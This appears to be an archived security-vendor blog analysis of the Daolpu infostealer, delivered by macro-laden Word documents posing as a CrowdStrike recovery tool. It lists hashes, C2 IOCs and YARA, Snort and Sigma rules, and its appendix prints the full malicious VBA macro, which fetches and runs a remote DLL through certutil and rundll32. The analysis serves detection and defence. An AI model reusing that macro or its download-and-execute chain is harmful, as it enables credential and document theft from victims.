{
	"id": "9d1b0ca8-fd30-40a2-9d5e-3314e3952111",
	"created_at": "2026-04-10T03:21:23.874274Z",
	"updated_at": "2026-04-10T13:11:44.170025Z",
	"deleted_at": null,
	"sha1_hash": "064281f0893bf17ff0aac2cf83baf81fd68b7d0f",
	"title": "Daolpu Infostealer: Full analysis of the latest malware exploited post CrowdStrike outage",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 138833,
	"plain_text": "Daolpu Infostealer: Full analysis of the latest malware exploited\r\npost CrowdStrike outage\r\nBy Katuiscia Benloukil\r\nPublished: 2024-07-25 · Archived: 2026-04-10 02:41:19 UTC\r\nWhile we all stand in unity with cyber and IT teams who have been working tirelessly to restore systems\r\nfollowing last week’s CrowdStrike patch failure, cyber criminals continue to exploit the situation by launching\r\nphishing campaigns.\r\nDiscovered on July 24th, 2024, the latest malware on the list is: Daolpu. A Word document containing macros that\r\ndownload an unidentified stealer now tracked as Daolpu.\r\nMacroviruses exploit the macro scripting capabilities of office applications like Microsoft Word and Excel to\r\nembed malicious code within document files. These viruses spread rapidly through email attachments and shared\r\ndocuments, making them a persistent threat in various environments. This paper provides a detailed technical\r\nanalysis of macrovirus evolution, infection mechanisms, and current detection and mitigation strategies. The\r\ncurrent malware sample exploits the opportunity presented by a recent CrowdStrike outage to deliver its payload\r\nusing a weaponized Word document. By leveraging this context, attackers might exploit the surge in attempts to\r\nrepair the issue and the appearance of legitimacy to perform their attack. Once opened, the weaponized document\r\ndownloads and executes a stealer.\r\nDaolpu is one of the quickest malware strains to exploit the window of opportunity. The following timeline shows\r\nhow reactive the threat actors were following the incident:\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 1 of 30\n\nTimeline of malware creation over time\r\nTEHTRIS Threat Intel team exposes in this report the mechanisms of Daolpu Stealer in depth.\r\nAnalyst opinion\r\nThe sample lacks obfuscation and evasion techniques, likely due to the short window of opportunity created by\r\nthe recent CrowdStrike outage. It is estimated that the development of this tool took less than two days, suggesting\r\nthat the malware was hastily crafted specifically to exploit this temporary vulnerability. This rapid development\r\ncycle indicates a targeted approach, focusing on immediate deployment rather than long‑term stealth and\r\npersistence. Consequently, the malware’s straightforward design highlights its purpose‑built nature for this\r\nparticular attack scenario.\r\nSamples\r\nIn the following section, we will provide a detailed examination of each malicious file involved in the attack. This\r\nanalysis includes file names, hashes, sizes, and other relevant attributes.\r\nTable 1: “New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm”\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 2 of 30\n\nType Value\r\nFile Type Microsoft Word 2007+\r\nDateTimestamp N/A\r\nSIZE 303K\r\nMD5 dd2100dfa067caae416b885637adc4ef\r\nSHA256 803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61\r\nTable 2: “ThisDocument.cls”\r\nType Value\r\nFile Type SCII text, with very long lines (470)\r\nDateTimestamp N/A\r\nSIZE 17K\r\nMD5 cc7c247c00295665aed802b30f1793c\r\nSHA256 6d3f611353c7fc8aa65b48b3bc054682aad6b2d7c1321f4fb1b6ed98bb88aa9d\r\nTable 3: “http://172.104.160.126:8099/payload2.txt”\r\nType Value\r\nFile Type PEM certificate\r\nDateTimestamp N/A\r\nSIZE 1.9M\r\nMD5 d67ea3b362d4e9b633216e85ac643d1f\r\nSHA256 5eaf0f1c1d23f4372e24eb15ee969552c416a38dbc45e4f2b4af283e3bfb8721\r\nTable 4: “mscorsvc.dll”\r\nType Value\r\nFile Type PE32+ executable (DLL) (GUI) x86‑64, for MS Windows, 7 sections\r\nDateTimestamp 2024‑07‑19 08:10:10\r\nSIZE 1.4M\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 3 of 30\n\nMD5 eb29329de4937b34f218665da57bcef4\r\nSHA256 4ad9845e691dd415420e0c253ba452772495c0b971f48294b54631e79a22644a\r\nThe following schema provides a detailed illustration of the infection chain with Mitre technics associated,\r\noffering a step‑by‑step breakdown of how the attack unfolds to clarify the interactions and dependencies between\r\nthe various components previously listed.\r\nCode details\r\nThe script of the macrovirus has been fully extracted and can be found in appendices.\r\nThe executable has been compiled using Visual Studio 2019 (version14.39/33519) with debug symbols stripped,\r\nresulting in a Program Database (PDB) file. Despite the removal of debug symbols, the PDB file contains\r\nmetadata that can be leveraged to detect the malware (c.f. the yara section).\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 4 of 30\n\nFigure 1: HTTP request to download stage2\r\nTechniques\r\nThe next picture details the MITRE ATT\u0026CK techniques utilized by the malware sample and each of its\r\ncomponents (Phishing, User Execution, Deobfuscate/Decode Files or Information, Automated Collection, Data\r\nfrom Local System, Ingress Tool Transfer, Non‑Standard Port, Web Service, Automated Exfiltration, Exfiltration\r\nOver Web Service, Financial Theft, Phishing, User Execution, Deobfuscate/Decode Files or Information,\r\nAutomated Collection, Data from Local System, Ingress Tool Transfer, NonStandard Port, Web Service,\r\nAutomated Exfiltration, Exfiltration Over Web Service, Financial Theft)\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 5 of 30\n\nContext\r\nThe next schema illustrates the STIX2 representation of the attack, providing a structured and standardized format\r\nfor describing the incident. The raw JSON data is available in the appendices.\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 6 of 30\n\nExecution\r\nInitial execution\r\nThe initial payload is a DOCM file, spread through a phishing campaign. For the CrowdStrike fix to be relevant, it\r\nmust target relatively large companies, as these organizations typically have antispam countermeasures in place\r\nthat should block such threats. The attackers likely aimed at exploiting the temporary lapse in security to bypass\r\nthese defenses and deliver their payload. The number of potential victims should be low.\r\nThe macro is executed by the script This Document.cls:Document_Open at the opening of the document. By\r\ndefault, the user must enable macro execution in word; when it’s done the malicious payload is executed without\r\nadditional user interaction.\r\nThe next screenshot is from the TEHTRIS sandbox, captured immediately after the infection. This image\r\nhighlights the initial impact of the malware, while subsequent execution phases occur in the background. This\r\nprovides an early glimpse into the malware’s behavior before it fully executes its payload.\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 7 of 30\n\nFigure 2: Document preview on the victim side\r\nSensitive data\r\nBecause the malware is a stealer, its sole goal is to collect and exfiltrate data. It focuses on gathering sensitive\r\ninformation from the infected system and transmitting it to the attacker’s server, ensuring that the stolen data can\r\nbe used for malicious purposes such as identity theft or financial fraud.\r\nCollection\r\nThe malware automatically exfiltrates credentials from the following browsers: Mozilla Firefox, Microsoft Edge,\r\nGoogle Chrome, and Coc Coc Browser. The inclusion of Coc Coc Browser, which is popular in Vietnam, may\r\nindicate that the campaign specifically targets Vietnamese entities.\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 8 of 30\n\nFigure 3: Supported Browsers\r\nThe malware also crawls the disk seeking sensitive documents, exfiltrating every file that matches the following\r\nextensions: .doc, .docx, .xls, .xlsx, .pdf, .txt, .ppt, and .pptx. By targeting these common document formats, the\r\nmalware aims to gather a wide range of potentially valuable and sensitive information.\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 9 of 30\n\nCredential\r\nThe malware extracts passwords and sensitive data from the previously cited browsers. This sensitive information\r\nis collected into a file prior to its exfiltration, ensuring that all gathered credentials and personal data are\r\nconsolidated and ready for transmission to the attacker’s server.\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 10 of 30\n\nFigure 4: Results file\r\nTo collect Firefox credentials, the malware uses the mozglue library to parse the Firefox configuration. This\r\nallows the malware to efficiently access and extract stored login information and other sensitive data from the\r\nbrowser’s internal files.\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 11 of 30\n\nFigure 5: Use of Firefox Libraries\r\nExfiltration\r\nThe exfiltration is performed automatically over an HTTP channel using multipart POST uploads. The lack of\r\nencryption suggests that the malware was developed in a hurry, as it does not implement basic security measures\r\nto protect the transferred data, making it more vulnerable to interception and analysis.\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 12 of 30\n\nFigure 6: HTTP exfiltration\r\nCommand and control\r\nIdentification\r\nThe Command and Control (C2) server is hosted by Linode LLC, a cloud provider. The attacker likely purchased\r\na Virtual Private Server (VPS) from Linode to conduct their attack.\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 13 of 30\n\nFigure 7: Ip lookup of the C2\r\nTo uniquely identify the victim, the malware uses the MAC address as part of the host fingerprint. This approach\r\nensures that each infected system can be individually tracked based on its network hardware address.\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 14 of 30\n\nFigure 8: HTTP request to download stage2\r\nThe C2 server was down at the time of the analysis.\r\nCommands\r\nNo commands are exchanged with the C2; the sensitive information is sent in a one‑way stream from the stealer to\r\nthe C2 server. This means that the malware simply transmits collected data without receiving any instructions or\r\nupdates from the attacker.\r\nCryptography\r\nNo cryptographic mechanisms have been implemented in the sample.\r\nIOCs\r\nURLs\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 15 of 30\n\nhttp://172 [dot] 104.160.126:8099/payload2.txt\r\nhttp://172 [dot] 104.160.126:5000/Uploadss\r\nFiles and registry\r\nC:\\Windows\\Temp\\cookies.sqlite‑shm\r\nC:\\Windows\\Temp\\login data\r\nC:\\Windows\\Temp\\result.txt\r\nC:\\Windows\\Temp\\Login Data\r\nC:\\Windows\\Temp\\cookies.sqlite\r\nC:\\Windows\\Temp\\cookies.sqlite‑wal\r\nArtifacts\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 16 of 30\n\nSubcommands are not capturing stout and stderr and may leak information (lazy system invokation):\r\nFigure 9: Leaks from commands\r\nSimilar samples\r\nOther samples of the same malware have been spotted in our intelligence database. Here are the SHA‑256 hashes\r\nof these samples:\r\n4ad9845e691dd415420e0c253ba452772495c0b971f48294b54631e79a22644a\r\n3a9323a939fbecbc6d0ceb5c1e1f3ebde91e9f186b46fdf3ba1aee03d1d41cd8\r\nf0fce67c1f360d045c21249f6faaac4d64b36aad02c8b877ab7db1e35f7c71f5\r\nDetection\r\nYara\r\nWe did not manage to yara sign the macrovirus. A snort and sigma will evently spot them.\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 17 of 30\n\nimport \"pe\"\r\nrule DaolpuStealer {\r\n meta:\r\n author = \"PEZIER Pierre-Henri. Copyright TEHTRIS 2024\"\r\n strings:\r\n $str_01 = \"\\\\Temp\\\\result.txt\" fullword\r\n $str_02 = \"docx\" wide fullword\r\n $str_03 = \"xlsx\" wide fullword\r\n $str_04 = \"doc\" wide fullword\r\n $str_05 = \"xls\" wide fullword\r\n $str_06 = \"ppt\" wide fullword\r\n $str_07 = \"pptx\" wide fullword\r\n $str_08 = \"pdf\" wide fullword\r\n $str_09 = \"txt\" wide fullword\r\n condition:\r\n pe.is_pe and\r\n (\r\n pe.pdb_path matches /Mal_Cookie.*mscorsvc.pdb$/\r\n or all of ($str*)\r\n )\r\n}\r\nsnort\r\nThe macrovirus and stealer implant will be detected easily by the following rules:\r\nalert http any any -\u003e any any (\\\r\n sid: 110000002;\\\r\n msg: \"Download certificate encoded PE Executable\";\\\r\n metadata: author PEZIER Pierre-Henri. Copyright TEHTRIS 2024;\\\r\n content: \"-----BEGIN CERTIFICATE-----\"; startswith; isdataat:0, relative;\\\r\n content: \"TVqQ\"; within: 10;\\\r\n classtype: file-format;\\\r\n rev: 1;\r\nalert http any any -\u003e any any (\\\r\n sid: 110000003;\\\r\n msg: \"Daolpu stealer\";\\\r\n metadata: author PEZIER Pierre-Henri. Copyright TEHTRIS 2024;\\\r\n content:\"POST\"; http_method; http.uri; content:\"/Uploadss\";\\\r\n classtype: file-format;\\\r\n rev: 1;\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 18 of 30\n\nsigma\r\nThe following sigma detects the DLL behavior.\r\ntitle: Daolpu stealer\r\nid: 008ee86c-ea30-4cb9-a1cf-d8f733e8502d\r\ndescription: Daolpu stealer\r\nauthor: TEHTRIS - Pezier Pierre-Henri\r\ndate: 2024-07-24\r\ntags:\r\n - detection.threat_hunting\r\nlogsource:\r\n category: file_access\r\n product: windows\r\ndetection:\r\n source_process:\r\n - Image|endswith: '\\rundll32.exe'\r\n results_file:\r\n - TargetFileName: 'C:\\Windows\\Temp\\result.txt'\r\n - TargetFileName: 'C:\\Windows\\Temp\\Login Data'\r\n - TargetFileName: 'C:\\Windows\\Temp\\cookies.sqlite'\r\n - TargetFileName: 'C:\\Windows\\Temp\\cookies.sqlite-wal'\r\n - TargetFileName: 'C:\\Windows\\Temp\\cookies.sqlite-shm'\r\n condition: results_file and source_process\r\nfalsepositives:\r\n - Unknown\r\nlevel: critical\r\nAppendice\r\nOffice document macro\r\nSource code of ThisDocument.cls:\r\nxcopy C:\\Windows\\System32\\curl.exe C:\\Users\\admin\\AppData\\Local\\Temp\r\ncertutil -f -encode C:\\Users\\admin\\AppData\\Local\\Temp\\curl.exe C:\\Users \\admin\\AppData\\Local\\Temp\\curl.txt\r\ncertutil -f -decode C:\\Users\\admin\\AppData\\Local\\Temp\\curl.txt C:\\Users \\admin\\AppData\\Local\\Temp\\curl.exe\r\nC:\\Users\\admin\\AppData\\Local\\Temp\\curl.exe http://172.104.160.126:8099/ payload2.txt -o C:\\Users\\admin\\AppData\\L\r\ncertutil -f -decode C:\\Users\\admin\\AppData\\Local\\Temp\\mscorsvc.txt C:\\ Users\\admin\\AppData\\Local\\Temp\\mscorsvc.d\r\ndel C:\\Users\\admin\\AppData\\Local\\Temp\\curl.exe\r\ndel C:\\Users\\admin\\AppData\\Local\\Temp\\curl.txt\r\ndel C:\\Users\\admin\\AppData\\Local\\Temp\\curl.exe\r\ndel C:\\Users\\admin\\AppData\\Local\\Temp\\mscorsvc.txt\r\nSTART \" \" rundll32 C:\\Users\\admin\\AppData\\Local\\Temp\\mscorsvc.dll, DllMain\r\nexit\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 19 of 30\n\nCommands run by macro\r\n' Declare PtrSafe Sub Sleep Lib \"kernel32\" (ByVal dwMilliseconds As LongPtr)\r\n' Declare Sub Sleep Lib \"kernel32\" (ByVal dwMilliseconds As Long)\r\n' Sub ChangeText()\r\n' ActiveDocument.Words(19).Text = \"The \"\r\n' End Sub\r\nSub DeleteText()\r\n ' Dim rngFirstParagraph As Range\r\n \r\n ' Set rngFirstParagraph = ActiveDocument.Paragraphs(4).Range\r\n ' With rngFirstParagraph\r\n ' .Delete\r\n ' .InsertAfter Text:=\"New text\"\r\n ' .InsertParagraphAfter\r\n ' End With\r\n Set rngFirstParagraph = ActiveDocument.Paragraphs(4).Range\r\n With rngFirstParagraph\r\n .Delete\r\n .InsertAfter Text:=\"Fourth paragraph displayed \" + Chr(34)\r\n .InsertParagraphAfter\r\n End With\r\n Set rngFirstParagraph = ActiveDocument.Paragraphs(5).Range\r\n With rngFirstParagraph\r\n .Delete\r\n .InsertAfter Text:=\"Fifth paragraph displayed\"\r\n .InsertParagraphAfter\r\n End With\r\n Set rngFirstParagraph = ActiveDocument.Paragraphs(6).Range\r\n With rngFirstParagraph\r\n .Delete\r\n .InsertAfter Text:=\"Sixth paragraph displayed\"\r\n .InsertParagraphAfter\r\n End With\r\n Set rngFirstParagraph = ActiveDocument.Paragraphs(7).Range\r\n With rngFirstParagraph\r\n .Delete\r\n .InsertAfter Text:=\"Seventh paragraph displayed\"\r\n .InsertParagraphAfter\r\n End With\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 20 of 30\n\nFor i = 1 To ActiveDocument.Paragraphs.Count\r\n ' ActiveDocument.Paragraphs(i).Style = wdStyleNormal\r\n Set myRange = ActiveDocument.Paragraphs(i).Range\r\n With myRange.Font\r\n ' .Bold = True\r\n .Name = \"Times New Roman\"\r\n .Size = 14\r\n End With\r\n Next i\r\nEnd Sub\r\nSub ShowErrorText()\r\n Dim rngFirstParagraph As Range\r\n \r\n Set rngFirstParagraph = ActiveDocument.Paragraphs(4).Range\r\n With rngFirstParagraph\r\n .Delete\r\n .InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + Chr\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + Ch\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + Chr\r\n .InsertParagraphAfter\r\n .InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3)\r\n .InsertParagraphAfter\r\n .InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + Ch\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + Ch\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + Chr\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3)\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3)\r\n .InsertParagraphAfter\r\n .InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + C\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3)\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + Chr\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3)\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3)\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 21 of 30\n\n.InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + Ch\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + Ch\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + Chr\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + Ch\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + Ch\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3)\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \"\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\r\n \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\r\n .InsertParagraphAfter\r\n End With\r\nEnd Sub\r\n'Show msgbox\r\nSub MsgFunc()\r\n Dim Msg, Style, Title, Help, Ctxt, Response, MyString\r\n Msg = \"The document cannot be fully displayed due to missing fonts. Do you want to install missing fonts?\"\r\n Style = vbYesNo Or vbCritical Or vbDefaultButton2 ' Define buttons.\r\n Title = \"Missing font\" ' Define title.\r\n Help = \"DEMO.HLP\" ' Define Help file.\r\n Ctxt = 1000 ' Define topic context.\r\n ' Display message.\r\n Response = MsgBox(Msg, Style, Title, Help, Ctxt)\r\n If Response = vbYes Then ' User chose Yes.\r\n MyString = \"Yes\" ' Perform some action.\r\n DeleteText\r\n Else ' User chose No.\r\n MyString = \"No\" ' Perform some action.\r\n 'MsgFunc\r\n End If\r\nEnd Sub\r\nSub MainFunc()\r\n Dim curl_enc_txt_path As String\r\n Dim curl_dec_exe_path As String\r\n Dim mal_enc_txt_url As String\r\n Dim mal_enc_txt_path As String\r\n Dim mal_dec_exe_path As String\r\n Dim pp As String\r\n Dim cc As String\r\n Dim dir As String\r\n Dim host As String\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 22 of 30\n\ndir = ActiveDocument.Path\r\n dir = Environ(\"temp\")\r\n host = \"http://172.104.160.126:8099\"\r\n curl_enc_txt_path = dir + \"\\curl.txt\"\r\n curl_dec_exe_path = dir + \"\\curl.exe\"\r\n mal_enc_txt_url = host + \"/payload2.txt\"\r\n mal_enc_txt_path = dir + \"\\mscorsvc.txt\"\r\n mal_dec_exe_path = dir + \"\\mscorsvc.dll\"\r\n pp = pp + \"C:\\Windows\\Sys\"\r\n pp = pp + \"tem32\\cmd.exe /c \"\r\n cc = cc + curl_enc_txt_path + curl_dec_exe_path\r\n pp = pp + \"xcopy C:\\Windows\\Sys\"\r\n cc = cc + curl_enc_txt_path + mal_enc_txt_url\r\n pp = pp + \"tem32\\cu\" + \"rl.exe \" + dir + \" \u0026 \"\r\n cc = cc + mal_enc_txt_path + mal_enc_txt_url\r\n pp = pp + \"certutil -f \"\r\n cc = cc + mal_enc_txt_path + mal_dec_exe_path\r\n pp = pp + \"-encode \" + dir + \"\\cu\" + \"rl.exe \" + curl_enc_txt_path + \" \u0026 \"\r\n cc = cc + pp + mal_dec_exe_path\r\n pp = pp + \"certutil -f \"\r\n cc = cc + pp + dir\r\n pp = pp + \"-decode \" + curl_enc_txt_path + \" \" + curl_dec_exe_path + \" \u0026 \"\r\n cc = cc + curl_enc_txt_path + dir\r\n pp = pp + curl_dec_exe_path + \" \" + mal_enc_txt_url + \" -o \" + mal_enc_txt_path + \" \u0026 \"\r\n cc = cc + curl_enc_txt_path + dir\r\n pp = pp + \"certutil -f \"\r\n cc = cc + curl_enc_txt_path + curl_dec_exe_path\r\n pp = pp + \"-decode \" + mal_enc_txt_path + \" \" + mal_dec_exe_path + \" \u0026 \"\r\n cc = cc + mal_enc_txt_url + curl_dec_exe_path\r\n pp = pp + \"del \" + dir + \"\\cu\" + \"rl.exe \u0026 \"\r\n cc = cc + host + pp + curl_enc_txt_path\r\n pp = pp + \"del \" + curl_enc_txt_path + \" \u0026 \"\r\n cc = cc + curl_enc_txt_path + dir\r\n pp = pp + \"del \" + curl_dec_exe_path + \" \u0026 \"\r\n cc = cc + curl_dec_exe_path + pp\r\n pp = pp + \"del \" + mal_enc_txt_path + \" \u0026 \"\r\n cc = cc + mal_enc_txt_path + pp\r\n Dim vbDblQuote As String\r\n vbDblQuote = Chr(34)\r\n pp = pp + \"START \" + vbDblQuote + \" \" + vbDblQuote + \" rundll32 \" + mal_dec_exe_path + \",DllMain\" + \" \u0026 \"\r\n cc = cc + mal_dec_exe_path + pp\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 23 of 30\n\npp = pp + \"exit\"\r\n cc = cc + dir + pp\r\n 'pp = pp + \"cmd.exe -d \u0026 exit\"\r\n 'cc = cc + mal_enc_txt_url + curl_dec_exe_path\r\n ' Shell (pp), vbHidden\r\n Dim objShell As Object\r\n Set objShell = CreateObject(\"WScript.Shell\")\r\n objShell.Run pp, 0, False\r\nEnd Sub\r\nSub Document_Open()\r\n MainFunc\r\nEnd Su\r\nStix2 graph\r\n{\r\n \"type\": \"bundle\",\r\n \"id\": \"bundle--fe929ee2-13da-4c6a-8810-be8c061ab434\",\r\n \"objects\": [\r\n {\r\n \"type\": \"campaign\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"campaign--c014b573-2a94-4c09-aaf9-2c5330dedb06\",\r\n \"lang\": \"en\",\r\n \"created\": \"2024-07-18T00:00:00.007Z\",\r\n \"name\": \"Crawdstrike Fake Update\",\r\n \"description\": \"CrowdStrike bug related phishing attack\"\r\n },\r\n {\r\n \"type\": \"identity\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"identity--bdc38620-34da-418b-9b72-fc1ae34b398f\",\r\n \"name\": \"CrowdStrike\",\r\n \"identity_class\": \"organization\"\r\n },\r\n {\r\n \"type\": \"malware\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"malware--7b96a7fc-74ef-435a-bd34-17cb2b3f7712\",\r\n \"is_family\": false,\r\n \"name\": \"Daolpu\",\r\n \"created_by_ref\": \"file--3ad05b73-3251-4b41-beca-5de1accc9a5e\",\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 24 of 30\n\n\"malware_types\": [\r\n \"spyware\"\r\n 